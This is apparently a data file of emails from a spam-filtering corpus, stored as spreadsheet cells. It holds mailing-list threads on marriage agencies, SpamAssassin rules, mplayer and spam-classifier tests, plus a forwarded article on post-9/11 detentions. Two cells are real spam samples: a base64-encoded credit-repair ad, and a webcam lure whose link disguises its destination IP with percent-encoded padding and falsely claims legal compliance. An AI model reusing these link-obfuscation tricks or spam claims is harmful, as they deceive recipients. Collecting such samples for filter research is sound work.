 ALB&gt; in search of a wife.
 ALB&gt; "I got to Thailand at 2 p.m., and by 4 p.m. I'd met Wan," he said. "I knew I
 ALB&gt; found her attractive. I could tell straight away that she was very caring."
 ALB&gt; Moylan spent a week in Thailand, and after returning to England kept in
 ALB&gt; touch with Wan by phone and mail. Six months later she came to England and
 ALB&gt; the couple married.
 ALB&gt; MR. MARRIAGE
 ALB&gt; Lawrence Lynch, 49, runs Thai Professional Introduction Services, the agency
 ALB&gt; Moylan used to meet his wife. Lynch, who calls himself "Mr. Marriage,"
 ALB&gt; started the company after also marrying a Thai woman through an introduction
 ALB&gt; agency.
 ALB&gt; Since then he has helped set up hundreds of marriages.
 ALB&gt; "In the last five years we've done about 400," he said. "To the best of my
 ALB&gt; knowledge, they have all been successful."
 ALB&gt; Male clients pay $2,213 for the service, although men from countries that
 ALB&gt; require them to handle some of the visa work on their own get a discount.
 ALB&gt; Clients then get to view catalogs and videos of hundreds of Thai women
 ALB&gt; looking for a husband. If they like what they see they come to Bangkok.
 ALB&gt; Clients are introduced to several women in chaperoned meetings in Lynch's
 ALB&gt; office -- encounters that can often be awkward given mutual shyness and
 ALB&gt; language problems.
 ALB&gt; "We find that the gentlemen are usually just as nervous as the ladies,"
 ALB&gt; Lynch said. "But once they start meeting the ladies they soon relax."
 ALB&gt; After the first meeting, couples can decide to go on dates to get to know
 ALB&gt; each other better. Within two weeks of arrival, Lynch says, almost every
 ALB&gt; client has found a potential wife.
 ALB&gt; "At the end of a fortnight it's very, very rare for a guy to go back and
 ALB&gt; think he hasn't made his mind up," he said. In most cases, marriage follows,
 ALB&gt; usually within the next year.
 ALB&gt; Roongthip Kamchat, managing director of Thai No. 1 Connections, a
 ALB&gt; Bangkok-based agency, says she has introduced about 1,000 couples, and less
 ALB&gt; than 10 percent have broken up.
 ALB&gt; Roongthip says she sometimes has a difficult time calming men who have just
 ALB&gt; arrived in Bangkok looking for a wife.
 ALB&gt; "Sometimes they are very nervous," she said. "And sometimes they are very
 ALB&gt; impatient and say 'Give me a lady, I want to get married now.' I say: 'Calm
 ALB&gt; down, OK, we'll talk."'
 ALB&gt; But if men are really in a hurry, Roongthip says, she can find them a wife
 ALB&gt; and get them married within a week. Lynch says clients he has found wives
 ALB&gt; for include a blind man, a man with one leg and a man with post-traumatic
 ALB&gt; stress disorder.
 ALB&gt; WHY?
 ALB&gt; Similar marriage agencies can be found in many developing countries. Critics
 ALB&gt; say they thrive on the neediness of lonely Western men who are unable to
 ALB&gt; form relationships in their own country, and on the desperation of
 ALB&gt; impoverished women who believe they can find a better life in the West.
 ALB&gt; But Moylan says that if the arrangement makes both partners happy, there is
 ALB&gt; no reason to object. "If you talk about people who are needy, I think
 ALB&gt; everybody wants someone to love them, and wants someone to love, so yes, I
 ALB&gt; need Wan," he said.
 ALB&gt; "Thai women are dissatisfied with life in Thailand. I think there's no
 ALB&gt; secret there. They are looking for a better life. I don't have a problem
 ALB&gt; with that. In return they are willing to give a lot of love and care to
 ALB&gt; their future husband."
 ALB&gt; Lynch says men are dissatisfied with Western women too, and that is why they
 ALB&gt; choose to use his agency.
 ALB&gt; His brochure promises an alternative to the "kind of de-feminized,
 ALB&gt; over-sized, self-centered, mercenary-minded lady available on the British
 ALB&gt; singles scene," and says he can make dreams come true even for men who are
 ALB&gt; not "God's gift to women."
 ALB&gt; Roongthip said many Western men found it difficult to meet women in their
 ALB&gt; own countries -- and found Thai women attractive.
 ALB&gt; "They don't know how to meet women. Even if they go to pubs or discotheques
 ALB&gt; or restaurants or department stores, how can they ask people to marry them?
 ALB&gt; Impossible," she said.
 ALB&gt; "Many Thai girls are slim, have long hair, black eyes, small nose. They are
 ALB&gt; good at taking care and joking and laughing, not strict. Different from
 ALB&gt; ladies from other countries."
 ALB&gt; Although many couples married through agencies have a considerable age gap,
 ALB&gt; the agencies say this is not a problem. They say language problems are also
 ALB&gt; not a major obstacle.
 ALB&gt; "Thai ladies are not ageist, and they have no qualms whatsoever about having
 ALB&gt; a husband who is significantly older," Lynch said. "When I met my wife she
 ALB&gt; couldn't speak a word of English. We muddled along with a phonetic
 ALB&gt; dictionary. The ladies are very keen to learn English and they pick it up
 ALB&gt; very quickly."
 ALB&gt; Many agencies also offer tuition for woman on what to expect when they move
 ALB&gt; to the West.
 ALB&gt; "We have kitchens, we have study classes," Roongthip said. "We teach them
 ALB&gt; how to eat, and when to make tea."
 ALB&gt; PITFALLS
 ALB&gt; But not all dreams come true. "Bee" is a 26-year-old Thai woman who went to
 ALB&gt; Switzerland two years ago with a man she met through an agency. Now she is
 ALB&gt; back in Bangkok, sad and angry.
 ALB&gt; "He had no friends, and I was so lonely," she said. "I tried to make him
 ALB&gt; happy but he just wanted sex and somebody to keep his house clean. He never
 ALB&gt; spoke to me."
 ALB&gt; Bee came back to Bangkok earlier this year. "I thought I would be happy
 ALB&gt; there," she said. "But it was the worst time of my life."
 ALB&gt; Lynch says that while some agencies are badly run, he makes checks to ensure
 ALB&gt; unsuitable candidates are weeded out.
 ALB&gt; "We are ethical and professional," he said. "We will not take on all
 ALB&gt; comers."
 ALB&gt; Moylan says that despite possible pitfalls, his own marriage is proof the
 ALB&gt; arrangement can work. Wan's sister has just signed up with Lynch's company,
 ALB&gt; looking for a foreign husband.
 ALB&gt; "Perhaps there are cases of women being exploited. I'm sure there are,"
 ALB&gt; Moylan said. "But in the majority of cases the women get a good deal."
 -- 
 Best regards,
  bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SACVS] CVS: spamassassin/rules 50_scores.cf,1.226,1.227
</t>
  </si>
  <si>
    <t xml:space="preserve">Update of /cvsroot/spamassassin/spamassassin/rules
 In directory usw-pr-cvs1:/tmp/cvs-serv4429/rules
 Modified Files:
 	50_scores.cf 60_whitelist.cf 
 Log Message:
 fixed bug 1033: -R and -W were not respecting auto_whitelist_path
 Index: 50_scores.cf
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/rules/50_scores.cf,v
 retrieving revision 1.226
 retrieving revision 1.227
 diff -b -w -u -d -r1.226 -r1.227
 --- 50_scores.cf	1 Oct 2002 09:53:43 -0000	1.226
 +++ 50_scores.cf	2 Oct 2002 13:20:32 -0000	1.227
 @@ -611,7 +611,7 @@
  score PORN_GALLERIES                 1.000
  score RATWARE_LC_OUTLOOK             1.000
  score SHORT_RECEIVED_LINE            4.300
 -score SAFEGUARD_NOTICE               -3.300
 +score SAFEGUARD_NOTICE               3.300
  score MAILMAN_CONFIRM                -1.000
  score SIGNIFICANT                    1.000
  score RATWARE_DIFFOND                2.200
 Index: 60_whitelist.cf
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/rules/60_whitelist.cf,v
 retrieving revision 1.31
 retrieving revision 1.32
 diff -b -w -u -d -r1.31 -r1.32
 --- 60_whitelist.cf	11 Sep 2002 21:31:35 -0000	1.31
 +++ 60_whitelist.cf	2 Oct 2002 13:20:33 -0000	1.32
 @@ -65,3 +65,4 @@
  # Friends re-united (popular UK old-school-network)
  whitelist_from_rcvd *@friendsreunited.co.uk                 friendsreunited.co.uk
 +
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Spamassassin-commits mailing list
 Spamassassin-commits@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-commits
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: International agreements
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85513638
 Date: Not supplied
 Eli the Bearded sez: 
     Ever wanted to see an international agreement? There are an awful lot of 
     them here, and the ones I looked at were surprizingly readable. I was 
     looking for the Balfour Declaration, the thing I saw cited as the start of 
     Israel recently. Suprizingly this document is only four paragraphs. The 
     Oslo Accords (Israel/PLO agreement of 1993) is another thing much shorter 
     than I had imagined.  
 Link[1] Discuss[2] (_Thanks, Eli!_)
 [1] http://www.yale.edu/lawweb/avalon/avalon.htm
 [2] http://www.quicktopic.com/boing/H/bYTBfpCnesw
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: rr Credit problems, guaranteed results 3606dBgC0-821K-13
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00D0_60C23C5B.C2145E20
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 MTkxNmVFcGgzLTkzN05RZW0yODUyR1FuQTMtbDI1DQoNCkFyZSB5b3UgbG9v
 a2luZyBmb3IgaGVscCB3aXRoIGNyZWRpdCBwcm9ibGVtcw0KWW91IGhhdmUg
 Zm91bmQgaXQsIFdFQiBDUkVESVQgR1VJREUNCkFjY2VzcyAmIGNsZWFuIHVw
 IGNyZWRpdCBwcm9ibGVtcyBmcm9tIHRoZSBjb252ZW5pZW5jZQ0Kb2YgeW91
 ciBjb21wdXRlcg0KUmVwYWlyIGNyZWRpdCBwcm9ibGVtcyBvbmxpbmUgZGly
 ZWN0bHkgd2l0aCBjcmVkaXQgYnVyZWF1cw0KSXQncyBlYXN5ICYgMTAwJSBn
 dWFyYW50ZWVkIHJlc3VsdHMNCg0KaHR0cDovL3d3dy53ZWJjcmVkaXQyMDAy
 LmNvbS8/Q0lEPTExOTAmTUlEPTEzNzAwDQoNCnRvbTE5NTIxNTY0MkB5YWhv
 by5jb20NCjYxNDJOaUlIMS02OTNVcXVLNzUyMG1uemM2LTg5MVBzWGY3NDY1
 bVNqTjgtODMwbk9pSjM3MTJsNTI=
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Should mplayer be build with Win32 codecs?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hi,
 First you have to get the win32 files !!!
 then , you configure using  --enable_win32 
 On Fri, 2002-09-20 at 13:11, Axel Thimm wrote:
 &gt; Hi,
 &gt; 
 &gt; has anyone an answer for me? The mplayer documentation still suggests to use
 &gt; them for x86 architectures.
 &gt; 
 &gt; Thanks. :)
 &gt; 
 &gt; Regards, Axel.
 &gt; 
 &gt; On Sat, Jun 08, 2002 at 11:39:03PM +0200, Axel Thimm wrote:
 &gt; &gt; Are there perhaps licensing issues, which forbid such a practice? Or any other
 &gt; &gt; reasons?
 &gt; &gt; 
 &gt; &gt; The reason I ask is that I have seen performance and also some feature
 &gt; &gt; differences (fullscreen w/o keeping aspect ratio, visual artifacts on NVIDIA)
 &gt; &gt; comparing with or without the Win32 codecs. The mplayer authors seem to
 &gt; &gt; recommend using them for x86 architectures.
 &gt; &gt; 
 &gt; &gt; Beware, I am no mplayer/codecs/whatever expert, I may be totally lost ...
 &gt; 
 &gt; -- 
 &gt; Axel.Thimm@physik.fu-berlin.de
 &gt; 
 &gt; _______________________________________________
 &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 &gt; 
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Adam,
 Thursday, September 05, 2002, 11:33:18 PM, you wrote:
 ALB&gt; So, you're saying that product bundling works? Good point.
 Sometimes I wish I was still in CA.  You deserve a good beating every
 so often...  (anyone else want to do the honors?)
 ALB&gt; And how is this any different from "normal" marriage exactly? Other then
 ALB&gt; that the woman not only gets a man, but one in a country where both she and
 ALB&gt; her offspring will have actual opportunities? Oh and the lack of
 ALB&gt; "de-feminized, over-sized, self-centered, mercenary-minded" choices?
 Mmkay.  For the nth time Adam, we don't live in the land of
 Adam-fantasy.  Women actually are allowed to do things productive,
 independent and entirely free of their male counterparts.  They aren't
 forced to cook and clean and merely be sexual vessels.   Sometimes,
 and this will come as a shock to you, no doubt, men and women even
 find -love- (which is the crucial distinction between this system) and
 they marry one another for the satisfaction of being together.   I
 know, far-fetched and idealistically crazy as it is, but such things
 do happen.   I can guarantee you, if my mother was approached by my
 father, and 25 years ago, he commented on her cleaning ability as a
 motivator for marrying her, we would not be having this conversation
 now.
 If guys still have silly antequated ideas about 'women's role' then
 their opportunities for finding women _will_ be scarce.   Again, these
 situations are great, provided everyone is aware that the relationship
 is a contractual one -- he wants a maid, a dog and a prostitute he
 doesn't have to pay, and she wants a country that isn't impoverished
 and teeming with AIDS.  A contract, versus a true love-interest
 marriage.
 Egh.  I really need to stop analyzing your posts to this extent.   I
 blame law school and my cat.
 -BB
 ALB&gt; - Adam L. "Duncan" Beberg
 ALB&gt;   http://www.mithral.com/~beberg/
 ALB&gt;   beberg@mithral.com
 -- 
 Best regards,
  bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: I mean why not
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/01.html#i_mean_why_not
 Date: 2002-10-01T00:06:36-05:00
 _Kevin Fanning_: Hallmark vs. Successories[1]. &amp;#8220;At Successories you were 
 mostly left alone. There'd be brainstorm meetings to come up with new topics to 
 tackle ("Howsabout 'Diligence'?" "No I think we did that one already, didn't 
 we?") but mostly you could just hang around, bang away at whatever ideas you 
 had, show your manager what you were working on, and he/she'd give you 
 feedback, encouragement, tell you to keep at it, point to the poster of 
 Stick-to-it-iveness on their wall (Yes, we had our own brand of Successories 
 posters hanging everywhere. I mean why not.) and give you the thumbs up.&amp;#8221;
 [1] http://www.whygodwhy.com/archive/000071.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] telesp.net.br?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --qcHopEYAB45HaUaB
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 On Sun, Sep 22, 2002 at 02:33:48PM +0100, Justin Mason wrote:
 &gt; I seem to be getting a *lot* of spam relayed via these guys recently.
 &gt; Can others confirm this?
 &gt;=20
 &gt; if it's the case, I'll come up with a forged-hostname test for it.
 I do get some from them, typically some dsl.telesp.net.br host:
 % grep -c telesp.net.br *| sort -rn
 spammers-2002-09:59
 spammers-2002-08:64
 spammers-2002-07:23
 spammers-2002-06:13
 spammers-2002-05:4
 spammers-2002-04:2
 Definitely increasing per month.  Percentage-wise:  2002-09 has 1212
 spams in it, so 59/1212 is about 4.8%.  Last month was 3.6%.
 --=20
 Randomly Generated Tagline:
 I don't believe I've ever cuddled my elses.
               -- Larry Wall in &lt;199806221550.IAA07171@wall.org&gt;
 --qcHopEYAB45HaUaB
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE9jfH7AuOQUeWAs2MRAkcuAKDZpe2Imevx9OkqkCh1rKh2IXvv6ACfZ/kn
 aBRBTJx/PNPOZg5GNPk5b/s=
 =mUje
 -----END PGP SIGNATURE-----
 --qcHopEYAB45HaUaB--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Autorun CDs
</t>
  </si>
  <si>
    <t xml:space="preserve">Apologies all.  I have comitted a cardinal sin by not specifying that this
 was for a windows machine.
 ----- Original Message -----
 From: "Kenn Humborg" &lt;kenn@bluetree.ie&gt;
 To: "David Crozier" &lt;davidcrozier@hotmail.com&gt;
 Cc: &lt;ilug@linux.ie&gt;
 Sent: Friday, August 16, 2002 1:51 PM
 Subject: RE: [ILUG] Autorun CDs
 &gt; &gt; Cheers All for your words of wisdom.
 &gt; &gt;
 &gt; &gt; I came across this which has worked a treat:-
 &gt; &gt;
 &gt; &gt; http://www.avdf.com/mar97/art_autorun.html
 &gt;
 &gt; (This is all Windows-related autorun stuff).
 &gt;
 &gt; So why did you waste the time of those who looked
 &gt; up Linux-related info for you?  If you said that it
 &gt; was for Windows, you'd probably have gotten both
 &gt; more relevant answers and flames for asking this on
 &gt; a _Linux_ mailing list.
 &gt;
 &gt; Sheesh...
 &gt;
 &gt; Later,
 &gt; Kenn
 &gt;
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 20, 2002 at 12:21:12PM +0100, Wynne, Conor mentioned:
 &gt; Well boyz, whats the story? Its tuesday an all. I've to work late today so
 &gt; what time are we talking about? 
  I've to leave the girlfriend home first. So, I'll be there sometime just
 after seven.
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 has anyone an answer for me? The mplayer documentation still suggests to use
 them for x86 architectures.
 Thanks. :)
 Regards, Axel.
 On Sat, Jun 08, 2002 at 11:39:03PM +0200, Axel Thimm wrote:
 &gt; Are there perhaps licensing issues, which forbid such a practice? Or any other
 &gt; reasons?
 &gt; 
 &gt; The reason I ask is that I have seen performance and also some feature
 &gt; differences (fullscreen w/o keeping aspect ratio, visual artifacts on NVIDIA)
 &gt; comparing with or without the Win32 codecs. The mplayer authors seem to
 &gt; recommend using them for x86 architectures.
 &gt; 
 &gt; Beware, I am no mplayer/codecs/whatever expert, I may be totally lost ...
 -- 
 Axel.Thimm@physik.fu-berlin.de
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: you can watch me
</t>
  </si>
  <si>
    <t xml:space="preserve">Me and my friends have this brand new idea, a Live Webcam &lt;a href="http://%31%30%31%31%30%31%31%31%30%31%31%31%31%30%31%30%31%30%31%30%31%30%31%31%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%31%30%31%30%31%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%31%30%30%30%31%30%31%31%30%31%31%31%30%31%30%31%30%31%30%31%30%31%30%30%30%31%31%30%31%30%31%30%31%31%30%31%30%31%30%31%30%31%31%30%31@%34%2E%34%37%2E%39%36%2E%31%34%31/msga.html"&gt; Click Here &lt;a/&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;font size="1"&gt;This is NOT SPAM - You have received this e-mail because 
 at one time or another you entered the weekly draw at one of
 our portals or FFA sites. We comply with all proposed and current laws 
 on commercial e-mail under (Bill s. 1618 TITLE III passed by the 105th 
 Congress).
  If you have received this e-mail in error, we apologize for the 
 inconvenience and ask that you remove yourself. 
 Click  &lt;a href="mailto:myscrotumhurts@aol.com"&gt;Here to Unsubscribe&lt;/a&gt;
 &lt;br&gt;
 fysibvcgjyuwinmyvbpjtaebsymyukbrkn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] nightly mass-check and hit-frequencies
</t>
  </si>
  <si>
    <t xml:space="preserve">Daniel Quinlan wrote:
 DQ&gt; jm@jmason.org (Justin Mason) writes:
 DQ&gt; 
 DQ&gt; &gt; But I think rsync is key; it's very efficient bandwidth-wise, and it
 DQ&gt; &gt; allows you to select which ones you want just as well as wget would.
 DQ&gt; &gt; (Bandwidth is a much bigger issue for me and some other of the europeans
 DQ&gt; &gt; involved, than it would be for you guys ;)  IMO it's by far the most
 DQ&gt; &gt; efficient and scriptable way to do this stuff, these days.
 DQ&gt; 
 DQ&gt; It must be horrible being a dial-up user in 2002.  If we can *automate*
 DQ&gt; rsync submission with good *authentication*, it would be fine with me.
 DQ&gt; The current rsync method is not sufficiently authenticated, though.
 I'll take a look at it.  I'm sure there's got to be some reasonly easy way to 
 have rsync carry itself over ssh and secure access using ssh keys.
 DQ&gt; &gt; I suggest we use the hughes-family.org server for rsyncing, as we do for
 DQ&gt; &gt; the corpus_submit stuff -- in a separate subdirectory, though! -- then
 DQ&gt; &gt; I'll take a look at getting a nightly hit-frequencies-collation system
 DQ&gt; &gt; going.
 Ok, I'll take a look at it.
 C
</t>
  </si>
  <si>
    <t xml:space="preserve">[Anthony Baxter]
 &gt; 5 sets, each of 1800ham/1550spam, just ran the once (it matched all 5 to
 &gt; each other...)
 &gt;
 &gt; rates.py sez:
 &gt;
 &gt; Training on Data/Ham/Set1 &amp; Data/Spam/Set1 ... 1798 hams &amp; 1548 spams
 &gt;       0.445   0.388
 &gt;       0.445   0.323
 &gt;       2.108   4.072
 &gt;       0.556   1.097
 &gt; Training on Data/Ham/Set2 &amp; Data/Spam/Set2 ... 1798 hams &amp; 1546 spams
 &gt;       2.113   0.517
 &gt;       1.335   0.194
 &gt;       3.106   5.365
 &gt;       2.113   2.903
 &gt; Training on Data/Ham/Set3 &amp; Data/Spam/Set3 ... 1798 hams &amp; 1547 spams
 &gt;       2.447   0.646
 &gt;       0.945   0.388
 &gt;       2.884   3.426
 &gt;       2.058   1.097
 &gt; Training on Data/Ham/Set4 &amp; Data/Spam/Set4 ... 1803 hams &amp; 1547 spams
 &gt;       1.057   2.584
 &gt;       0.723   1.682
 &gt;       0.890   1.164
 &gt;       0.445   0.452
 &gt; Training on Data/Ham/Set5 &amp; Data/Spam/Set5 ... 1798 hams &amp; 1550 spams
 &gt;       0.779   4.328
 &gt;       0.501   3.299
 &gt;       0.667   3.361
 &gt;       0.388   4.977
 &gt; total false pos 273 3.03501945525
 &gt; total false neg 367 4.74282760403
 How were these msgs broken up into the 5 sets?  Set4 in particular is giving
 the other sets severe problems, and Set5 blows the f-n rate on everything
 it's predicting -- when the rates across runs within a training set vary by
 as much as a factor of 25, it suggests there was systematic bias in the way
 the sets were chosen.  For example, perhaps they were broken into sets by
 arrival time.  If that's what you did, you should go back and break them
 into sets randomly instead.  If you did partition them randomly, the wild
 variance across runs is mondo mysterious.
 &gt;&gt; I expect hammie will do a much better job on this already than hand
 &gt;&gt; grepping.  Be sure to stare at the false positives and get the
 &gt;&gt; spam out of there.
 &gt; Yah, but there's a chicken-and-egg problem there - I want stuff that's
 &gt; _known_ to be right to test this stuff,
 Then you have to look at every message by eyeball -- any scheme has non-zero
 error rates of both kinds.
 &gt; so using the spambayes code to tell me whether it's spam is not
 &gt; going to help.
 Trust me &lt;wink&gt; -- it helps a *lot*.  I expect everyone who has done any
 testing here has discovered spam in their ham, and vice versa.  Results
 improve as you improve the categorization.  Once the gross mistakes are
 straightened out, it's much less tedious to scan the rest by eyeball.
 [on skip tokens]
 &gt; Yep, it shows up in a lot of spam, but also in different forms in hams.
 &gt; But the hams each manage to pick a different variant of
 &gt; ~~~~~~~~~~~~~~~~~~~~~~
 &gt; or whatever - so they don't end up counteracting the various bits in the
 &gt; spam.
 &gt;
 &gt; Looking further, a _lot_ of the bad skip rubbish is coming from
 &gt; uuencoded viruses &amp;c in the spam-set.
 For whatever reason, there appear to be few of those in BruceG's spam
 collection.  I added code to strip uuencoded sections, and pump out uuencode
 summary tokens instead.  I'll check it in.  It didn't make a significant
 difference on my usual test run (a single spam in my Set4 is now judged as
 ham by the other 4 sets; nothing else changed).  It does shrink the database
 size here by a few percent.  Let us know whether it helps you!
 Before and after stripping uuencoded sections:
 false positive percentages
     0.000  0.000  tied
     0.000  0.000  tied
     0.050  0.050  tied
     0.000  0.000  tied
     0.025  0.025  tied
     0.000  0.000  tied
     0.075  0.075  tied
     0.025  0.025  tied
     0.025  0.025  tied
     0.000  0.000  tied
     0.050  0.050  tied
     0.000  0.000  tied
     0.025  0.025  tied
     0.000  0.000  tied
     0.000  0.000  tied
     0.050  0.050  tied
     0.025  0.025  tied
     0.000  0.000  tied
     0.025  0.025  tied
     0.050  0.050  tied
 won   0 times
 tied 20 times
 lost  0 times
 total unique fp went from 8 to 8 tied
 false negative percentages
     0.255  0.255  tied
     0.364  0.364  tied
     0.254  0.291  lost   +14.57%
     0.509  0.509  tied
     0.436  0.436  tied
     0.218  0.218  tied
     0.182  0.218  lost   +19.78%
     0.582  0.582  tied
     0.327  0.327  tied
     0.255  0.255  tied
     0.254  0.291  lost   +14.57%
     0.582  0.582  tied
     0.545  0.545  tied
     0.255  0.255  tied
     0.291  0.291  tied
     0.400  0.400  tied
     0.291  0.291  tied
     0.218  0.218  tied
     0.218  0.218  tied
     0.145  0.182  lost   +25.52%
 won   0 times
 tied 16 times
 lost  4 times
 total unique fn went from 89 to 90 lost    +1.12%
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Iowa: "There was frost outside this morning!"
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:8:21:06AM
 Date: Tue, 24 Sep 2002 15:21:06 GMT
 Iowa[1]: "There was frost outside this morning!"
 [1] http://iowa.weblogger.com/2002/09/24
</t>
  </si>
  <si>
    <t xml:space="preserve"> --- Matthias Saou &lt;matthias@egwn.net&gt; wrote: &gt; Once
 upon a time, Chris wrote :
 &gt; 
 &gt; &gt; To bring things back on topic, I was practicing my
 &gt; "rpmbuild'n skillz"
 &gt; &gt; and made an rpm with some simple software tools to
 &gt; drive my DVD+RW
 &gt; &gt; burner. No GUI frontend, but it works just fine
 &gt; from the command line. I
 &gt; &gt; even used it to burn a bootable DVD version of Red
 &gt; Hat 7.3.
 &gt; &gt; 
 &gt; &gt;
 &gt;
 ftp://people.redhat.com/ckloiber/dvd+rw-tools-0.1.src.rpm
 &gt; 
 &gt; Nice! :-)
 &gt; What about the "dvdrecord" package that's already
 &gt; included in 7.3? It
 &gt; doesn't do what this one does? I'm asking this
 &gt; because I've got a friend
 &gt; with an iMac running YellowDog Linux (basically Red
 &gt; Hat Linux for PPC), and
 &gt; it's one of the newer versions with a DVD burner.
 &gt; I'd be very interested in
 &gt; using his drive to burn DVDs full of 2-CDs movies or
 &gt; full of "files for
 &gt; xmame" ;-)
 &gt; Also, a bootable DVD of Red Hat Linux 7.3 would be
 &gt; great as I've still not
 &gt; burned the CDs even once for myself since I always
 &gt; install through the
 &gt; network (and haven't found an easy way of purchasing
 &gt; an english boxed set
 &gt; here in Spain...).
 &gt; 
 &gt; Matthias
 &gt; 
 That's done by bero - not too sure whether it works on
 DVD+RW drives, I believe it supports only DVD-R.
 Would be nice to have a unified tool for DVD/CD
 burning - already I do my CD burning from dvdrecord
 since it is more recent.
 Regards,
 Michel
 __________________________________________________
 Do You Yahoo!?
 Everything you'll ever need on one web page
 from News and Sport to Email and Music Charts
 http://uk.my.yahoo.com
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NYTimes.com Article: After Sept. 11, a Legal Battle Over Limits of Civil Liberty
</t>
  </si>
  <si>
    <t xml:space="preserve">This article from NYTimes.com 
 has been sent to you by luke@applix.com.
 The mind boggles at the idea that the Bush administration has not bothered to find a serious rationale at all, much less one extraordinary enough to justify these extraordinary measures, much less present it to the public, and that the Bush administration appears to be against American-style justice.
 The default explanation for government secrecy is to conceal official wrongdoing.  The administration is here making the case that Americans don't even have a right to question government secrecy.
 We may find that the history of this past year has been an epic looting from the public, made possible by the urgency of reacting to 9/11.
 luke@applix.com
 After Sept. 11, a Legal Battle Over Limits of Civil Liberty
 August 4, 2002
 By THE NEW YORK TIMES 
 This article was reported and written by Adam Liptak, Neil
 A. Lewis and Benjamin Weiser. 
 In the fearful aftermath of Sept. 11, Attorney General John
 Ashcroft vowed to use the full might of the federal
 government and "every available statute" to hunt down and
 punish "the terrorists among us." 
 The roundup that followed the attacks, conducted with
 wartime urgency and uncommon secrecy, led to the detentions
 of more than 1,200 people suspected of violating
 immigration laws, being material witnesses to terrorism or
 fighting for the enemy. 
 The government's effort has produced few if any law
 enforcement coups. Most of the detainees have since been
 released or deported, with fewer than 200 still being held.
 But it has provoked a sprawling legal battle, now being
 waged in federal courthouses around the country, that
 experts say has begun to redefine the delicate balance
 between individual liberties and national security. 
 The main combatants are the attorney general and federal
 prosecutors on one side and a network of public defenders,
 immigration and criminal defense lawyers, civil
 libertarians and some constitutional scholars on the other,
 with federal judges in between. 
 The government's record has so far been decidedly mixed. As
 it has pushed civil liberties protections to their limits,
 the courts, particularly at the trial level, have pushed
 back, stopping well short of endorsing Mr. Ashcroft's
 tactics or the rationales he has offered to justify them.
 Federal judges have, however, allowed the government to
 hold two American citizens without charges in military
 brigs, indefinitely, incommunicado and without a road map
 for how they might even challenge their detentions. 
 In the nation's history, the greatest battles over the
 reach of government power have occurred against the
 backdrop of wartime. Some scholars say the current
 restrictions on civil liberties are relatively minor by
 historical standards and in light of the risks the nation
 faces. 
 The current struggle centers on three sets of issues.
 People held simply for immigration violations have objected
 to new rules requiring that their cases be heard in secret,
 and they have leveraged those challenges into an attack on
 what they call unconstitutional preventive detentions. 
 People brought in and jailed as material witnesses, those
 thought to have information about terrorist plots, have
 argued that they should not be held to give testimony in
 grand jury investigations. 
 Finally, Yasser Esam Hamdi and Jose Padilla, the two
 Americans labeled "enemy combatants" for what the
 government contends is more direct involvement with
 terrorist groups, are seeking rights once thought to be
 fundamental to American citizens, like a lawyer's
 representation and a chance to challenge their detentions
 before a civilian judge. 
 So far, federal judges in Newark and Detroit have ordered
 secret deportation proceedings opened to public scrutiny,
 and on Friday a federal district judge in Washington
 ordered that the identities of most of the detainees be
 made public under the Freedom of Information Act. 
 "Secret arrests," Judge Gladys Kessler wrote in the
 decision on Friday, "are a concept odious to a democratic
 society." 
 A senior Justice Department official said the detentions
 had been lawful and effective. He said it was hard to
 "prove a negative" and cite specific terrorist acts that
 had been disrupted. But he said that department officials
